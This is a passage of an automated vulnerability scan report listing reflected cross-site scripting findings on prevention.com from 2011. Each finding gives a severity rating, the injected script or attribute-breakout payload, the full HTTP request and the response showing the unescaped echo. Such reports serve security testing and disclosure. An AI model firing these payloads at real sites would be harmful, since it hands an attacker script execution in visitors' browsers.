GET /cda/channelpage.do?channel=9f64a'><script>alert(1)</script>d5f9ba885bc HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=000049alRyd0wlEKKdZo9LItXlP:145vrsjho; Path=/
Content-Length: 64827

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<input type='hidden' name='channel' value='9f64a'><script>alert(1)</script>d5f9ba885bc' >
...[SNIP]...

2.84. http://www.prevention.com/cda/channelpage.do [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/channelpage.do

Issue detail

The value of the channel request parameter is copied into an HTML comment. The payload 4526d--><script>alert(1)</script>70532fedd4 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/channelpage.do?channel=4526d--><script>alert(1)</script>70532fedd4 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
$WSEP:
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000xWcPEy6b4i3ZVMsP9noNAmj:145vrsjai; Path=/
Content-Length: 64827

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>
   <title>Prevention.com - 404 Page Not Foun
...[SNIP]...
<!-- CK: -channel-4526d--><script>alert(1)</script>70532fedd4-header-refreshAdTag-false Generated at Thu Mar 10 12:04:52 EST 2011-->
...[SNIP]...

2.85. http://www.prevention.com/cda/newslettersignup.do [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/newslettersignup.do

Issue detail

The value of the source request parameter is copied into an HTML comment. The payload c4211--><script>alert(1)</script>d23ccfe71a8 was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/newslettersignup.do?source=PVN-Footer-MAINc4211--><script>alert(1)</script>d23ccfe71a8 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000PXjWsJfDXDY5jYQdUo7qcFe:145vrsjho; Path=/
Content-Length: 69588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
   <t
...[SNIP]...
<!-- CK: home-relatedContent-newslettersignup-src-PVN-Footer-MAINc4211--><script>alert(1)</script>d23ccfe71a8 Generated at Thu Mar 10 12:04:51 EST 2011-->
...[SNIP]...

2.86. http://www.prevention.com/cda/newslettersignup.do [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/newslettersignup.do

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3854e"><script>alert(1)</script>0b8c471daec was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/newslettersignup.do?source=PVN-Footer-MAIN3854e"><script>alert(1)</script>0b8c471daec HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 10 Mar 2011 17:04:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 17:04:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000oI6o8qaOUdzyvOIEKZxQ4YI:145vrsjho; Path=/
Content-Length: 69580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
   <t
...[SNIP]...
<input type="hidden" name="currentSource" value="PVN-Footer-MAIN3854e"><script>alert(1)</script>0b8c471daec"/>
...[SNIP]...

2.87. http://www.prevention.com/cda/toolfinder.do [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c782"><script>alert(1)</script>21167d254ad was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?tf_type=bmi_calculator&channel=health7c782"><script>alert(1)</script>21167d254ad HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1799
Date: Thu, 10 Mar 2011 17:04:56 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 66194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/prevention/health7c782"><script>alert(1)</script>21167d254ad;topic=toolsfinders;sbtpc=bmicalculator;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.88. http://www.prevention.com/cda/toolfinder.do [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32b19'%3balert(1)//ce148ec1e37 was submitted in the channel parameter. This input was echoed as 32b19';alert(1)//ce148ec1e37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?tf_type=bmi_calculator&channel=health32b19'%3balert(1)//ce148ec1e37 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 17:05:00 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 65883


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/' + siteName + '/health32b19';alert(1)//ce148ec1e37;' + rasegs + ';topic=' + topic + ';sbtpc=' + sbtpc + ';cat=' + cat + ';kw=;tile=' + tile++ + ';slot=728x90.1;sz=728x90;dcopt=ist;ord=' + ord + '?" type="text/javascript">
...[SNIP]...

2.89. http://www.prevention.com/cda/toolfinder.do [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The value of the channel request parameter is copied into an HTML comment. The payload f1f7c--><script>alert(1)</script>2181276a0fa was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?tf_type=bmi_calculator&channel=healthf1f7c--><script>alert(1)</script>2181276a0fa HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 17:05:03 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 66215


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<!-- CK: -channel-healthf1f7c--><script>alert(1)</script>2181276a0fa-header-refreshAdTag-false Generated at Thu Mar 10 12:05:03 EST 2011-->
...[SNIP]...

2.90. http://www.prevention.com/cda/toolfinder.do [channel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bc398'><script>alert(1)</script>3b6cfed1002 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?tf_type=bmi_calculator&channel=healthbc398'><script>alert(1)</script>3b6cfed1002 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1799
Date: Thu, 10 Mar 2011 17:04:58 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 66194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<input type='hidden' id='category_core' value='Healthbc398'><script>alert(1)</script>3b6cfed1002-BMI Calculator Tool'>
...[SNIP]...

2.91. http://www.prevention.com/cda/toolfinder.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba4c"><script>alert(1)</script>dcc32349675 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?eba4c"><script>alert(1)</script>dcc32349675=1 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 17:04:41 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 60445


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<input type="hidden" name="link" value="http://www.prevention.com/cda/toolfinder.do?eba4c"><script>alert(1)</script>dcc32349675=1">
...[SNIP]...

2.92. http://www.prevention.com/cda/toolfinder.do [tf_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The value of the tf_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffa48"><script>alert(1)</script>450cfb1292c was submitted in the tf_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?tf_type=bmi_calculatorffa48"><script>alert(1)</script>450cfb1292c&channel=health HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 17:04:47 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 68323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<A HREF="http://ad.doubleclick.net/jump/prevention/health;topic=toolsfinders;sbtpc=bmicalculatorffa48"><script>alert(1)</script>450cfb1292c;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=123456?" TARGET="_blank">
...[SNIP]...

2.93. http://www.prevention.com/cda/toolfinder.do [tf_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The value of the tf_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9cb4</script><script>alert(1)</script>188bcef6d60 was submitted in the tf_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cda/toolfinder.do?tf_type=bmi_calculatora9cb4</script><script>alert(1)</script>188bcef6d60&channel=health HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 17:04:52 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 68628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
rom non-JavaScript browsers
       var ord=Math.random()*10000000000000000;
       var tile= 1;
       var num = ord + "?";
       
       
           var topic= "toolsfinders";
                           
       
                           var sbtpc= "bmicalculatora9cb4</script><script>alert(1)</script>188bcef6d60";
       
       
                           var cat= "";
       
       
       var    querystring = location.search.substring(1);
       var querystringArray = querystring.split("&");
       var siteParam = 'prevention';
       var testPar
...[SNIP]...

2.94. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3fea'style%3d'x%3aexpression(alert(1))'9d40cdf2b5c was submitted in the REST URL parameter 3. This input was echoed as f3fea'style='x:expression(alert(1))'9d40cdf2b5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/cook/everyday-recipesf3fea'style%3d'x%3aexpression(alert(1))'9d40cdf2b5c/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:06:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' id='category_core' value='Cook-Everyday Recipesf3fea'style='x:expression(alert(1))'9d40cdf2b5c'>
...[SNIP]...

2.95. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a938'%3b9442c45c8e was submitted in the REST URL parameter 3. This input was echoed as 8a938';9442c45c8e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/cook/everyday-recipes8a938'%3b9442c45c8e/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 90132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/cook/everyday-recipes8a938';9442c45c8e/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.96. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77598'%3bcbbca8dfe77 was submitted in the REST URL parameter 4. This input was echoed as 77598';cbbca8dfe77 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple77598'%3bcbbca8dfe77/article/9a9b65680a90e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple77598';cbbca8dfe77/article/9a9b65680a90e210VgnVCM10000030281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.97. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3a68'style%3d'x%3aexpression(alert(1))'8aefa16a7c1 was submitted in the REST URL parameter 5. This input was echoed as b3a68'style='x:expression(alert(1))'8aefa16a7c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/articleb3a68'style%3d'x%3aexpression(alert(1))'8aefa16a7c1/9a9b65680a90e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1793
Date: Thu, 10 Mar 2011 17:08:37 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 72535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Cook-Everyday Recipes-Healthy Recipes Quick And Easy Ways To Use Pineapple-Articleb3a68'style='x:expression(alert(1))'8aefa16a7c1'>
...[SNIP]...

2.98. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b5a2'%3bad663f93c42 was submitted in the REST URL parameter 6. This input was echoed as 8b5a2';ad663f93c42 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____8b5a2'%3bad663f93c42 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:10:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____8b5a2';ad663f93c42&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.99. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b1b4'%3b959f1b413af was submitted in the REST URL parameter 3. This input was echoed as 9b1b4';959f1b413af in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/belly-abs9b1b4'%3b959f1b413af/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
